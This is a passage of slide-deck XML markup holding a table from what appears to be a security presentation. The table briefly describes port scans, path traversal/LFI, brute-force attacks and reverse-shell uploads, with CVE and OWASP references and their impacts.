            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="Google Shape;1119;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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1120" name="Google Shape;1120;p62"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1093300"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{43937092-1D85-4520-81C4-1C38C2314272}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2029200"/>
                <a:gridCol w="3247075"/>
                <a:gridCol w="3086225"/>
              </a:tblGrid>
              <a:tr h="3778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80250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1500">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Port Scan</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="15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Attacker can determine the least restrictive way to attempt to access the target network.</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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knows how to access the target and also where/how to insert malware. Also can cause DoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr baseline="30000" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> attacks.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="12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62000">
                <a:tc>
                  <a:txBody>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Path </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1500">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Traversal</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Local File Inclusion </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1500">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>(LFI)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i="1" sz="12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Allows access into confidential files on a website or any web-based file system.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>⧫ CVE-2002-1344 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>(NIST)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>⧫ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Sensitive Data Exposure </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>(OWASP)</a:t>
                      </a:r>
                      <a:endParaRPr sz="11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Attackers gain access to restricted directories and, often, also to folders </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>and files within.</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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29500">
                <a:tc>
                  <a:txBody>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Brute-Force Attack </a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="15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Hammers away at encrypted passwords until it finds a match.</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r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A6-2017-Security Misconfiguration </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1050">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>(OWASP)</a:t>
                      </a:r>
                      <a:endParaRPr sz="105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Enables the intruder to access whatever is protected by that/those password(s).</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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54490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Reverse-Shell Upload</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr b="1" i="1" lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Remote Command Execution Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i="1" sz="11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Also called a “connect-back” shell, this allows ongoing access to a remote machine.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">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r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2017-7269</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>(NIST)</a:t>
                      </a:r>
                      <a:endParaRPr sz="11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Ongoing access, ability to interact with victim network and the data within.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">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121" name="Google Shape;1121;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